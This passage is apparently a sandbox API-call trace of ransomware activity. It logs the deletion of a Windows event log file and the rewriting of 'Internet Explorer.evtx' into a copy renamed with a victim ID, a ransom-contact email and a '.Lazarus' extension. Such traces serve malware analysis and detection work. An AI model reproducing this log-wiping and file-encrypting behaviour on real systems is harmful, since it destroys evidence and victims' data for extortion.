dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 28 [0085.396] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x38) returned 0x78950 [0085.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x78950, cchWideChar=28 | out: lpWideCharStr="C:\\Logs\\HardwareEvents.evtx") returned 28 [0085.396] DeleteFileW (lpFileName="C:\\Logs\\HardwareEvents.evtx" (normalized: "c:\\logs\\hardwareevents.evtx")) returned 1 [0085.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78950 | out: hHeap=0x20000) returned 1 [0085.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0085.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0085.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0085.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0085.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0085.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0085.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d738 | out: hHeap=0x20000) returned 1 [0085.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5b8 | out: hHeap=0x20000) returned 1 [0085.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53970 | out: hHeap=0x20000) returned 1 [0085.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8be28 | out: hHeap=0x20000) returned 1 [0085.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0085.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0085.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0085.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0085.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0085.397] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.397] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.397] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505a2134, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505a2134, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x0, cFileName="Internet Explorer.evtx", cAlternateFileName="INTERN~1.EVT")) returned 1 [0085.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0085.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0085.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0085.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0085.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0085.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0085.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0085.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0085.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0085.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0085.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0085.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0085.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0085.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0085.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0085.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0085.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0085.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0085.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0085.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0085.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0085.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0085.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0085.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0085.398] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.398] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.398] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.398] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0085.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0085.398] AreFileApisANSI () returned 1 [0085.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Internet Explorer.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Internet Explorer.evtx", lpUsedDefaultChar=0x0) returned 31 [0085.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0085.398] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.399] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0085.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0085.399] AreFileApisANSI () returned 1 [0085.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0085.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3e) returned 0x53490 [0085.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x53490, cchWideChar=31 | out: lpWideCharStr="C:\\Logs\\Internet Explorer.evtx") returned 31 [0085.399] CreateFileW (lpFileName="C:\\Logs\\Internet Explorer.evtx" (normalized: "c:\\logs\\internet explorer.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0085.399] GetFileType (hFile=0x348) returned 0x1 [0085.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0085.399] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0085.399] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0085.400] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0085.400] CloseHandle (hObject=0x348) returned 1 [0085.400] AreFileApisANSI () returned 1 [0085.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0085.400] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3e) returned 0x53838 [0085.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=31 | out: lpWideCharStr="C:\\Logs\\Internet Explorer.evtx") returned 31 [0085.400] CreateFileW (lpFileName="C:\\Logs\\Internet Explorer.evtx" (normalized: "c:\\logs\\internet explorer.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0085.400] GetFileType (hFile=0x348) returned 0x1 [0085.400] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0085.400] CloseHandle (hObject=0x348) returned 1 [0085.400] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0085.400] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0085.400] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0085.400] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0085.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0085.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0085.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0085.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0085.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0085.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0085.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0085.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0085.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0085.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0085.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0085.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0085.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0085.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0085.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0085.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0085.401] AreFileApisANSI () returned 1 [0085.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0085.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3e) returned 0x533b8 [0085.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=31 | out: lpWideCharStr="C:\\Logs\\Internet Explorer.evtx") returned 31 [0085.401] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Internet Explorer.evtx" (normalized: "c:\\logs\\internet explorer.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505a2134, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505a2134, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0085.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0085.401] AreFileApisANSI () returned 1 [0085.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0085.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0085.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0085.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0085.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0085.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0085.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0085.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0085.401] GetLastError () returned 0x0 [0085.402] SetLastError (dwErrCode=0x0) [0085.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e260 [0085.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x53970 [0085.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b9c8 [0085.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0085.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0085.402] GetLastError () returned 0x0 [0085.402] SetLastError (dwErrCode=0x0) [0085.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0085.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0085.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x68b30 [0085.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0085.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76278 [0085.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b30 | out: hHeap=0x20000) returned 1 [0085.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0085.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0085.402] AreFileApisANSI () returned 1 [0085.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 93 [0085.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xba) returned 0x51590 [0085.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x51590, cchWideChar=93 | out: lpWideCharStr="C:\\Logs\\Internet Explorer.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 93 [0085.402] CreateFileW (lpFileName="C:\\Logs\\Internet Explorer.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\logs\\internet explorer.evtx.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0085.403] GetFileType (hFile=0x348) returned 0x1 [0085.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51590 | out: hHeap=0x20000) returned 1 [0085.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0085.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0085.403] AreFileApisANSI () returned 1 [0085.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0085.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3e) returned 0x533b8 [0085.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=31 | out: lpWideCharStr="C:\\Logs\\Internet Explorer.evtx") returned 31 [0085.403] CreateFileW (lpFileName="C:\\Logs\\Internet Explorer.evtx" (normalized: "c:\\logs\\internet explorer.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0085.403] GetFileType (hFile=0x424) returned 0x1 [0085.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0085.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69db0 [0085.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0085.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.403] GetLastError () returned 0x0 [0085.403] SetLastError (dwErrCode=0x0) [0085.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.404] GetLastError () returned 0x0 [0085.404] SetLastError (dwErrCode=0x0) [0085.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0085.404] ReadFile (in: hFile=0x424, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0085.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0085.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0085.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0085.489] GetLastError () returned 0x0 [0085.489] SetLastError (dwErrCode=0x0) [0085.489] GetLastError () returned 0x0 [0085.489] SetLastError (dwErrCode=0x0) [0085.489] GetLastError () returned 0x0 [0085.489] SetLastError (dwErrCode=0x0) [0085.489] GetLastError () returned 0x0 [0085.489] SetLastError (dwErrCode=0x0) [0085.489] ReadFile (in: hFile=0x424, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.574] WriteFile (in: hFile=0x348, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.575] GetLastError () returned 0x0 [0085.575] SetLastError (dwErrCode=0x0) [0085.575] GetLastError () returned 0x0 [0085.575] SetLastError (dwErrCode=0x0) [0085.575] GetLastError () returned 0x0 [0085.575] SetLastError (dwErrCode=0x0) [0085.575] GetLastError () returned 0x0 [0085.575] SetLastError (dwErrCode=0x0) [0085.575] ReadFile (in: hFile=0x424, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.575] WriteFile (in: hFile=0x348, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.576] GetLastError () returned 0x0 [0085.576] SetLastError (dwErrCode=0x0) [0085.576] GetLastError () returned 0x0 [0085.576] SetLastError (dwErrCode=0x0) [0085.576] GetLastError () returned 0x0 [0085.576] SetLastError (dwErrCode=0x0) [0085.576] GetLastError () returned 0x0 [0085.576] SetLastError (dwErrCode=0x0) [0085.576] ReadFile (in: hFile=0x424, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.576] WriteFile (in: hFile=0x348, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.597] GetLastError () returned 0x0 [0085.597] SetLastError (dwErrCode=0x0) [0085.597] GetLastError () returned 0x0 [0085.597] SetLastError (dwErrCode=0x0) [0085.597] GetLastError () returned 0x0 [0085.597] SetLastError (dwErrCode=0x0) [0085.597] GetLastError () returned 0x0 [0085.597] SetLastError (dwErrCode=0x0) [0085.597] ReadFile (in: hFile=0x424, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.597] WriteFile (in: hFile=0x348, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.598] GetLastError () returned 0x0 [0085.598] SetLastError (dwErrCode=0x0) [0085.598] GetLastError () returned 0x0 [0085.598] SetLastError (dwErrCode=0x0) [0085.598] GetLastError () returned 0x0 [0085.598] SetLastError (dwErrCode=0x0) [0085.598] GetLastError () returned 0x0 [0085.598] SetLastError (dwErrCode=0x0) [0085.598] ReadFile (in: hFile=0x424, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.598] WriteFile (in: hFile=0x348, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.599] GetLastError () returned 0x0 [0085.599] SetLastError (dwErrCode=0x0) [0085.599] GetLastError () returned 0x0 [0085.599] SetLastError (dwErrCode=0x0) [0085.599] GetLastError () returned 0x0 [0085.599] SetLastError (dwErrCode=0x0) [0085.599] GetLastError () returned 0x0 [0085.599] SetLastError (dwErrCode=0x0) [0085.599] ReadFile (in: hFile=0x424, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.599] WriteFile (in: hFile=0x348, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.599] GetLastError () returned 0x0 [0085.599] SetLastError (dwErrCode=0x0) [0085.600] GetLastError () returned 0x0 [0085.600] SetLastError (dwErrCode=0x0) [0085.600] GetLastError () returned 0x0 [0085.600] SetLastError (dwErrCode=0x0) [0085.600] GetLastError () returned 0x0 [0085.600] SetLastError (dwErrCode=0x0) [0085.600] ReadFile (in: hFile=0x424, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.600] WriteFile (in: hFile=0x348, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.600] GetLastError () returned 0x0 [0085.600] SetLastError (dwErrCode=0x0) [0085.600] GetLastError () returned 0x0 [0085.600] SetLastError (dwErrCode=0x0) [0085.601] GetLastError () returned 0x0 [0085.601] SetLastError (dwErrCode=0x0) [0085.601] GetLastError () returned 0x0 [0085.601] SetLastError (dwErrCode=0x0) [0085.601] ReadFile (in: hFile=0x424, 